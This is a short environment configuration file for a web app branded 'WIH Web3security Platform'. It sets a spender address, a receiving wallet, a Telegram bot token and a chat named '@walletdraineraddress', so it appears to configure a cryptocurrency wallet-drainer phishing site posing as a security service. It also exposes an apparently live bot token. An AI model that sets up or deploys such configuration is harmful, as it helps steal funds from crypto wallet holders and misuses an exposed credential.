SKIP_PREFLIGHT_CHECK="true"
NEXT_PUBLIC_PROJECT_ID="6ffddd4ace751579e6a1f075545dde02"
NEXT_PUBLIC_WEBSITE_NAME="WIH Web3security Platform"
NEXT_PUBLIC_SPENDER_ADDRESS="0x23d937060f034Fa6aE3b977A90060967Ff25b302"
NEXT_PUBLIC_ADDRESS="0x95aD61b0a150d79219dCF64E1E6Cc01f0B64C4cE"
NEXT_PUBLIC_BOT_TOKEN="7095023752:AAGH_bXRYtd3qe0kPI6AewFy4VVs8oqWCo0"
NEXT_PUBLIC_CHAT_ID="@walletdraineraddress"